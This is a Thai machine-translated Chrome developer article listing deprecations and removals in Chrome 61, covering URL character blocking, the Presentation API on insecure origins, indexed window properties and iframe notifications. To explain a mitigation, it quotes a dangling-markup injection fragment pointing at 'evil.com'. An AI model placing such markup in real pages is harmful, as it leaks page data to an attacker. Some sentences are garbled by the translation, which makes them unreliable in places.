หน้านี้ได้รับการแปลโดย Cloud Translation API

การเลิกใช้งานและการนำออกใน Chrome 61

โจ้ เมดเลย์

Twitter GitHub

เราเห็นการอัปเดตและการปรับปรุงผลิตภัณฑ์ ประสิทธิภาพ และความสามารถของแพลตฟอร์มเว็บใน Chrome เกือบทุกเวอร์ชัน บทความนี้อธิบายการเลิกใช้งานและการนำออกใน Chrome 61 ซึ่งเป็นเวอร์ชันเบต้าตั้งแต่วันที่ 3 สิงหาคม รายการนี้อาจเปลี่ยนแปลงได้ตลอดเวลา

ความปลอดภัยและความเป็นส่วนตัว

บล็อกทรัพยากรที่ URL มีอักขระ "\n" และ "<"

มีการแฮ็กประเภทหนึ่งที่เรียกว่าการแทรกมาร์กอัปแบบห้อยโหน ซึ่งจะใช้ URL ที่ถูกตัดเพื่อส่งข้อมูลไปยังปลายทางภายนอก เช่น ลองพิจารณาหน้าที่มี <img src='https://evil.com/? เนื่องจาก URL ไม่มีเครื่องหมายคำพูดปิด เบราว์เซอร์จะอ่านต่อกับเครื่องหมายคำพูดถัดไปที่เกิดขึ้น และจัดการอักขระที่ปิดล้อมเหมือนเป็น URL เดียว

Chrome 61 ช่วยลดช่องโหว่นี้โดยการจำกัดชุดอักขระที่อนุญาตในแอตทริบิวต์ href และ src กล่าวอย่างเจาะจงคือ Chrome จะหยุดประมวลผล URL เมื่อพบอักขระที่ขึ้นบรรทัดใหม่ (\n) แต่มีอักขระน้อยกว่า (< ตัว)

นักพัฒนาซอฟต์แวร์ที่มี Use Case ที่ถูกต้องสำหรับบรรทัดใหม่ และ URL ควรมีอักขระน้อยกว่า 1 ตัว ควรใช้ Escape กับอักขระเหล่านี้

เจตนาเพื่อนำออก | ตัวติดตาม Chromestatus | ข้อบกพร่อง Chromium

เลิกใช้งานและนำ Presentation API ออกในบริบทที่ไม่ปลอดภัย

พบว่าในต้นทางที่ไม่ปลอดภัย คุณสามารถใช้ Presentation API เป็นเวกเตอร์การแฮ็กในต้นทางที่ไม่ปลอดภัยได้ เนื่องจากจอแสดงผลไม่มีแถบที่อยู่ จึงใช้ API เพื่อปลอมแปลงเนื้อหาได้ อาจเป็นไปได้ที่จะขโมยข้อมูลจาก การเรียกใช้การนำเสนอ

เราวางแผนที่จะเลิกใช้งานและเลิกรองรับ Presentation API ในบริบทที่ไม่ปลอดภัย เพื่อให้สอดคล้องกับความตั้งใจของ Blink ในการนำฟีเจอร์ที่มีประสิทธิภาพในต้นทางที่ไม่ปลอดภัยออก ตั้งแต่ Chrome 61 เป็นต้นไป PresentationRequest.start() จะไม่ทำงานในต้นทางที่ไม่ปลอดภัยอีกต่อไป

เจตนาเพื่อนำออก | ตัวติดตาม Chromestatus | ข้อบกพร่อง Chromium

JavaScript

ไม่อนุญาตให้กำหนดพร็อพเพอร์ตี้ที่จัดทำดัชนีในหน้าต่าง

ก่อนหน้านี้บางเบราว์เซอร์อนุญาตให้มีการกำหนด JavaScript ดังตัวอย่างต่อไปนี้

    window[0] = 1;

หมายเหตุเกี่ยวกับข้อกำหนดของ HTML ปัจจุบัน ว่านี่เป็นการละเมิดข้อกำหนดของ JavaScript อย่างชัดแจ้ง ด้วยเหตุนี้ เราจึงนำความสามารถนี้ออกใน Chrome 61 นับตั้งแต่กุมภาพันธ์ 2016 Firefox เริ่มปฏิบัติตามข้อกำหนดแล้ว

ข้อบกพร่อง Chromium

นำการใช้การแจ้งเตือนออกจาก iframe ที่ไม่ปลอดภัย

คำขอสิทธิ์จาก iframe อาจทำให้ผู้ใช้สับสนได้ เนื่องจากความแตกต่างระหว่างต้นทางของหน้าที่มีและต้นทางของ iframe ที่ส่งคำขอนั้นเป็นเรื่องยาก เมื่อขอบเขตของคำขอไม่ชัดเจน ผู้ใช้ก็ตัดสินได้ยากว่าจะอนุญาตหรือปฏิเสธสิทธิ์

นอกจากนี้ การไม่อนุญาตการแจ้งเตือนใน iframe ยังจะช่วยให้ข้อกำหนดสิทธิ์การแจ้งเตือนสอดคล้องกับข้อความ Push อีกด้วย ซึ่งจะช่วยให้นักพัฒนาแอปง่ายขึ้น

นักพัฒนาซอฟต์แวร์ที่ต้องการฟังก์ชันนี้สามารถเปิดหน้าต่างใหม่เพื่อขอสิทธิ์การแจ้งเตือน

เจตนาเพื่อนำออก | ตัวติดตาม Chromestatus | ข้อบกพร่อง Chromium